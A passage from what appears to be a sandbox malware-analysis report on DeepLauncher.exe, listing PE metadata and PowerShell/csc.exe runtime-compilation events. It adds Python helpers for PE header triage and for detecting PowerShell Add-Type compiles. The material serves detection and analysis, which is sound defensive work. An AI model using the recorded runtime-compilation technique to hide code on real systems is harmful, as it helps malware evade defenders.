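    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
# Assumed set of names the MSVC linker normally emits; anything else is flagged for review.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                   ".rsrc", ".reloc", ".tls", ".bss", ".gfids"}
BIG_SECTION = 0x100000  # 1 MiB, the threshold the report uses


def parse_pe(data: bytes) -> dict:
    """Return image base, DllCharacteristics and the section table of a PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    file_hdr = e_lfanew + 4                        # IMAGE_FILE_HEADER, 20 bytes
    _machine, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, file_hdr)
    opt = file_hdr + 20                            # IMAGE_OPTIONAL_HEADER64
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ (magic 0x20b) is handled here")
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    sections = []
    table = opt + opt_size                         # IMAGE_SECTION_HEADER[], 40 bytes each
    for i in range(n_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, vaddr, raw_size = struct.unpack_from("<III", data, off + 8)
        sections.append({"name": name, "virtual_size": vsize,
                         "virtual_address": vaddr, "raw_size": raw_size})
    return {"image_base": image_base, "dll_characteristics": dll_chars, "sections": sections}


def triage(pe: dict) -> dict:
    """Apply the report's static checks to a parsed header."""
    flags = [name for bit, name in DLL_CHARACTERISTICS.items() if pe["dll_characteristics"] & bit]
    return {
        "flags": flags,
        "high_image_base": pe["image_base"] > 0x60000000,
        "big_sections": [s["name"] for s in pe["sections"] if s["raw_size"] > BIG_SECTION],
        "odd_sections": [s["name"] for s in pe["sections"] if s["name"] not in COMMON_SECTIONS],
        # ASLR, DEP and CFG are the three a hardening review asks about first.
        "missing_mitigations": [m for m in ("DYNAMIC_BASE", "NX_COMPAT", "GUARD_CF") if m not in flags],
    }


def build_sample() -> bytes:
    """Constructed PE32+ header carrying the values the report lists for DeepLauncher.exe."""
    sections = [  # (name, virtual size, virtual address, raw size); only the raw sizes come from the report
        (b".text",    0x61A7C0, 0x001000, 0x61A800),
        (b".rdata",   0x17C4A0, 0x61C000, 0x17C600),
        (b".data",    0x00A000, 0x799000, 0x004000),
        (b".CLR_UEF", 0x000100, 0x7A3000, 0x000200),
        (b".didat",   0x000400, 0x7A4000, 0x000400),
        (b"Section",  0x000800, 0x7A5000, 0x000800),
        (b"_RDATA",   0x000200, 0x7A6000, 0x000200),
        (b".rsrc",    0x160F00, 0x7A7000, 0x161000),
        (b".reloc",   0x00C000, 0x908000, 0x00C000),
    ]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)
    opt = bytearray(240)                                          # PE32+ optional header size
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<Q", opt, 24, 0x140000000)
    struct.pack_into("<H", opt, 70, 0x0020 | 0x0040 | 0x0100 | 0x4000 | 0x8000)
    table = b"".join(n.ljust(8, b"\0") + struct.pack("<IIII", vs, va, rs, 0x400) + b"\0" * 16
                     for n, vs, va, rs in sections)
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + table


if __name__ == "__main__":
    for key, value in triage(parse_pe(build_sample())).items():
        print(f"{key}: {value}")
```

Note that "odd" is a review prompt, not a verdict: .didat (delay-load import data), .CLR_UEF and _RDATA are routinely present in MSVC-built CoreCLR hosts such as the singlefilehost whose PDB path the report shows, so the one name in this sample worth a closer look is Section.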
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.TraceSource.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.pdbhP= source: powershell.exe, 00000008.00000002.1386081536.0000024104360000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: DeepLauncher.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TraceSource\Release\net8.0\System.Diagnostics.TraceSource.pdb source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: DeepLauncher.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.pdb source: powershell.exe, 00000008.00000002.1386081536.0000024104360000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp
Source: DeepLauncher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DeepLauncher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DeepLauncher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DeepLauncher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DeepLauncher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"
Source: DeepLauncher.exe | Static PE information: section name: .CLR_UEF
Source: DeepLauncher.exe | Static PE information: section name: .didat
Source: DeepLauncher.exe | Static PE information: section name: Section
Source: DeepLauncher.exe | Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAAB33D2A5 pushad ; iretd 4_2_00007FFAAB33D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAAB527BFC push esp; iretd 4_2_00007FFAAB527BFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAAB522316 push 8B485F93h; iretd 4_2_00007FFAAB52231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAB527EED push ecx; iretd 8_2_00007FFAAB527EEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAB526E0E push cs; iretd 8_2_00007FFAAB526E0F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAB527A9E push esi; iretd 8_2_00007FFAAB527AA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAB527CBA push esp; iretd 8_2_00007FFAAB527CBB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.dll
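The csc.exe launch recorded above (powershell.exe handing the compiler a response file whose directory and basename are the same random token under the user's Temp folder, ued2riov, after which csc.exe drops ued2riov.dll beside it and the PDB path for the same token turns up in PowerShell memory) is the footprint of PowerShell's Add-Type compiling C# at runtime, the pattern behind the "Dot net compiler compiles file from suspicious location" Sigma hit. The following is an added example, not part of the Joe Sandbox report or of the sample: it runs that check over constructed process-creation and file-creation records and ties each compiler launch to the PE it dropped. The field names (EventType, Image, ParentImage, CommandLine, TargetFilename, ProcessId) mirror Sysmon event IDs 1 and 11 but are an assumption about your log schema, and the PIDs and the MSBuild control record are made up.

```python
"""Detect PowerShell compiling C# on the fly, as csc.exe is launched above.

Added example, not part of the report. Add-Type passes csc.exe a response file
@"...\AppData\Local\Temp\<token>\<token>.cmdline" (token = 8 random characters,
ued2riov in this report) and csc.exe then writes <token>.dll into the same
directory. The records below are constructed; field names follow Sysmon
event IDs 1 and 11 but are an assumption about the log schema in use.
"""
import re
from collections import defaultdict

# Response-file argument exactly as Add-Type builds it for csc.exe / vbc.exe.
RESPONSE_FILE = re.compile(
    r'@"?(?P<dir>[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\(?P<token>[a-z0-9]{8}))'
    r'\\(?P=token)\.cmdline"?',
    re.IGNORECASE,
)
COMPILERS = ("\\csc.exe", "\\vbc.exe")
SCRIPT_HOSTS = ("\\powershell.exe", "\\pwsh.exe", "\\powershell_ise.exe")


def find_inline_compiles(events: list[dict]) -> list[dict]:
    """One finding per compiler run that a PowerShell host started with a Temp
    response file; each finding lists the files the compiler dropped in that directory."""
    dropped = defaultdict(list)
    for ev in events:
        if ev["EventType"] == "FileCreate" and ev["Image"].lower().endswith(COMPILERS):
            directory = ev["TargetFilename"].rsplit("\\", 1)[0].lower()
            dropped[directory].append(ev["TargetFilename"])
    findings = []
    for ev in events:
        if ev["EventType"] != "ProcessCreate":
            continue
        if not ev["Image"].lower().endswith(COMPILERS):
            continue
        if not ev["ParentImage"].lower().endswith(SCRIPT_HOSTS):
            continue
        match = RESPONSE_FILE.search(ev["CommandLine"])
        if not match:
            continue
        findings.append({
            "pid": ev["ProcessId"],
            "parent": ev["ParentImage"],
            "response_dir": match.group("dir"),
            "dropped": dropped.get(match.group("dir").lower(), []),
        })
    return findings


# Constructed records modelled on the process tree in this report (PIDs are made up).
EVENTS = [
    {"EventType": "ProcessCreate", "ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\DeepLauncher.exe",
     "CommandLine": "powershell.exe"},
    {"EventType": "ProcessCreate", "ProcessId": 5268,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
                    r'@"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"'},
    {"EventType": "FileCreate", "ProcessId": 5268,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.dll"},
    {"EventType": "ProcessCreate", "ProcessId": 5300,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": "cvtres.exe"},
    # Control: a developer build uses the same compiler but is started by MSBuild
    # with a project response file, so it must not match.
    {"EventType": "ProcessCreate", "ProcessId": 6010,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Program Files\dotnet\MSBuild.exe",
     "CommandLine": r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.csproj.rsp"'},
]

if __name__ == "__main__":
    for finding in find_inline_compiles(EVENTS):
        print(finding)
```

The backreference on the token is what keeps the rule tight: a response file anywhere under Temp is common in build tooling, but a directory and basename sharing the same 8-character random name is the CodeDOM temp-file layout that Add-Type produces, and correlating it with the DLL csc.exe writes into that directory gives you the artifact to collect.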

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (12 occurrences across the PowerShell processes)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (9 occurrences across the PowerShell processes)
Source: C:\Users\user\Desktop\DeepLauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
